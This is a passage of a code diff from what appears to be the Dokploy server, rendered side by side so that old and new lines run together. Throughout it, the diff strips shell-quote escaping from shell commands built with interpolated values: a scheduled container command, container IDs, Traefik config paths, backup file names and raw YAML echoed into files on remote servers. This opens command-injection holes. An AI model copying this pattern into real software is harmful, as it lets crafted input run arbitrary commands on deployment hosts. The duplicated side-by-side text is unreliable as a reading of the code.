`cd ${quote([tempDir])} && unzip ${quote([backupFile])} > /dev/null 2>&1`,
);
// Restore filesystem first // Restore filesystem first
emit("Restoring filesystem..."); emit("Restoring filesystem...");

View File

@@ -9,7 +9,6 @@ import {
} from "@dokploy/server/services/deployment"; } from "@dokploy/server/services/deployment";
import { findScheduleById } from "@dokploy/server/services/schedule"; import { findScheduleById } from "@dokploy/server/services/schedule";
import { scheduledJobs, scheduleJob as scheduleJobNode } from "node-schedule"; import { scheduledJobs, scheduleJob as scheduleJobNode } from "node-schedule";
import { quote } from "shell-quote";
import { getComposeContainer, getServiceContainer } from "../docker/utils"; import { getComposeContainer, getServiceContainer } from "../docker/utils";
import { execAsyncRemote } from "../process/execAsync"; import { execAsyncRemote } from "../process/execAsync";
import { spawnAsync } from "../process/spawnAsync"; import { spawnAsync } from "../process/spawnAsync";
@@ -78,12 +77,12 @@ export const runCommand = async (scheduleId: string) => {
serverId, serverId,
` `
set -e set -e
echo "Running scheduled command" >> ${quote([deployment.logPath])}; echo "Running command: docker exec ${containerId} ${shellType} -c '${command}'" >> ${deployment.logPath};
docker exec ${quote([containerId])} ${quote([shellType])} -c ${quote([command])} >> ${quote([deployment.logPath])} 2>> ${quote([deployment.logPath])} || { docker exec ${containerId} ${shellType} -c '${command}' >> ${deployment.logPath} 2>> ${deployment.logPath} || {
echo "❌ Command failed" >> ${quote([deployment.logPath])}; echo "❌ Command failed" >> ${deployment.logPath};
exit 1; exit 1;
} }
echo "✅ Command executed successfully" >> ${quote([deployment.logPath])}; echo "✅ Command executed successfully" >> ${deployment.logPath};
`, `,
); );
} catch (error) { } catch (error) {

View File

@@ -3,7 +3,6 @@ import path from "node:path";
import { createInterface } from "node:readline"; import { createInterface } from "node:readline";
import { paths } from "@dokploy/server/constants"; import { paths } from "@dokploy/server/constants";
import type { Domain } from "@dokploy/server/services/domain"; import type { Domain } from "@dokploy/server/services/domain";
import { quote } from "shell-quote";
import { parse, stringify } from "yaml"; import { parse, stringify } from "yaml";
import { encodeBase64 } from "../docker/utils"; import { encodeBase64 } from "../docker/utils";
import { execAsync, execAsyncRemote } from "../process/execAsync"; import { execAsync, execAsyncRemote } from "../process/execAsync";
@@ -58,7 +57,7 @@ export const removeTraefikConfig = async (
try { try {
const { DYNAMIC_TRAEFIK_PATH } = paths(!!serverId); const { DYNAMIC_TRAEFIK_PATH } = paths(!!serverId);
const configPath = path.join(DYNAMIC_TRAEFIK_PATH, `${appName}.yml`); const configPath = path.join(DYNAMIC_TRAEFIK_PATH, `${appName}.yml`);
const command = `rm -f ${quote([configPath])}`; const command = `rm -f ${configPath}`;
if (serverId) { if (serverId) {
await execAsyncRemote(serverId, command); await execAsyncRemote(serverId, command);
@@ -77,7 +76,7 @@ export const removeTraefikConfigRemote = async (
try { try {
const { DYNAMIC_TRAEFIK_PATH } = paths(true); const { DYNAMIC_TRAEFIK_PATH } = paths(true);
const configPath = path.join(DYNAMIC_TRAEFIK_PATH, `${appName}.yml`); const configPath = path.join(DYNAMIC_TRAEFIK_PATH, `${appName}.yml`);
await execAsyncRemote(serverId, `rm -f ${quote([configPath])}`); await execAsyncRemote(serverId, `rm -f ${configPath}`);
} catch (error) { } catch (error) {
console.error( console.error(
`Error removing remote traefik config for ${appName}:`, `Error removing remote traefik config for ${appName}:`,
@@ -107,10 +106,7 @@ export const loadOrCreateConfigRemote = async (
const fileConfig: FileConfig = { http: { routers: {}, services: {} } }; const fileConfig: FileConfig = { http: { routers: {}, services: {} } };
const configPath = path.join(DYNAMIC_TRAEFIK_PATH, `${appName}.yml`); const configPath = path.join(DYNAMIC_TRAEFIK_PATH, `${appName}.yml`);
try { try {
const { stdout } = await execAsyncRemote( const { stdout } = await execAsyncRemote(serverId, `cat ${configPath}`);
serverId,
`cat ${quote([configPath])}`,
);
if (!stdout) return fileConfig; if (!stdout) return fileConfig;
@@ -137,10 +133,7 @@ export const readRemoteConfig = async (serverId: string, appName: string) => {
const { DYNAMIC_TRAEFIK_PATH } = paths(true); const { DYNAMIC_TRAEFIK_PATH } = paths(true);
const configPath = path.join(DYNAMIC_TRAEFIK_PATH, `${appName}.yml`); const configPath = path.join(DYNAMIC_TRAEFIK_PATH, `${appName}.yml`);
try { try {
const { stdout } = await execAsyncRemote( const { stdout } = await execAsyncRemote(serverId, `cat ${configPath}`);
serverId,
`cat ${quote([configPath])}`,
);
if (!stdout) return null; if (!stdout) return null;
return stdout; return stdout;
} catch { } catch {
@@ -196,10 +189,7 @@ export const readConfigInPath = async (pathFile: string, serverId?: string) => {
const configPath = path.join(pathFile); const configPath = path.join(pathFile);
if (serverId) { if (serverId) {
const { stdout } = await execAsyncRemote( const { stdout } = await execAsyncRemote(serverId, `cat ${configPath}`);
serverId,
`cat ${quote([configPath])}`,
);
if (!stdout) return null; if (!stdout) return null;
return stdout; return stdout;
} }
@@ -231,7 +221,7 @@ export const writeConfigRemote = async (
const encoded = encodeBase64(traefikConfig); const encoded = encodeBase64(traefikConfig);
await execAsyncRemote( await execAsyncRemote(
serverId, serverId,
`echo "${encoded}" | base64 -d > ${quote([configPath])}`, `echo "${encoded}" | base64 -d > "${configPath}"`,
); );
} catch (e) { } catch (e) {
console.error("Error saving the YAML config file:", e); console.error("Error saving the YAML config file:", e);
@@ -249,7 +239,7 @@ export const writeTraefikConfigInPath = async (
const encoded = encodeBase64(traefikConfig); const encoded = encodeBase64(traefikConfig);
await execAsyncRemote( await execAsyncRemote(
serverId, serverId,
`echo "${encoded}" | base64 -d > ${quote([configPath])}`, `echo "${encoded}" | base64 -d > "${configPath}"`,
); );
} else { } else {
fs.writeFileSync(configPath, traefikConfig, "utf8"); fs.writeFileSync(configPath, traefikConfig, "utf8");
@@ -282,11 +272,7 @@ export const writeTraefikConfigRemote = async (
const { DYNAMIC_TRAEFIK_PATH } = paths(true); const { DYNAMIC_TRAEFIK_PATH } = paths(true);
const configPath = path.join(DYNAMIC_TRAEFIK_PATH, `${appName}.yml`); const configPath = path.join(DYNAMIC_TRAEFIK_PATH, `${appName}.yml`);
const yamlStr = stringify(traefikConfig); const yamlStr = stringify(traefikConfig);
const encoded = encodeBase64(yamlStr); await execAsyncRemote(serverId, `echo '${yamlStr}' > ${configPath}`);
await execAsyncRemote(
serverId,
`echo "${encoded}" | base64 -d > ${quote([configPath])}`,
);
} catch (e) { } catch (e) {
console.error("Error saving the YAML config file:", e); console.error("Error saving the YAML config file:", e);
} }

View File

@@ -1,5 +1,4 @@
import path from "node:path"; import path from "node:path";
import { quote } from "shell-quote";
import { import {
findApplicationById, findApplicationById,
findComposeById, findComposeById,
@@ -24,7 +23,7 @@ export const restoreVolume = async (
const backupPath = `${bucketPath}/${backupFileName}`; const backupPath = `${bucketPath}/${backupFileName}`;
// Command to download backup file from S3 // Command to download backup file from S3
const downloadCommand = `rclone copyto ${rcloneFlags.join(" ")} ${quote([backupPath])} ${quote([`${volumeBackupPath}/${backupFileName}`])}`; const downloadCommand = `rclone copyto ${rcloneFlags.join(" ")} "${backupPath}" "${volumeBackupPath}/${backupFileName}"`;
// Base restore command that creates the volume and restores data // Base restore command that creates the volume and restores data
const baseRestoreCommand = ` const baseRestoreCommand = `
@@ -41,7 +40,7 @@ export const restoreVolume = async (
-v ${volumeName}:/volume_data \ -v ${volumeName}:/volume_data \
-v ${volumeBackupPath}:/backup \ -v ${volumeBackupPath}:/backup \
ubuntu \ ubuntu \
bash -c "cd /volume_data && tar xvf /backup/${quote([backupFileName])} ." bash -c "cd /volume_data && tar xvf /backup/${backupFileName} ."
echo "Volume restore completed ✅" echo "Volume restore completed ✅"
`; `;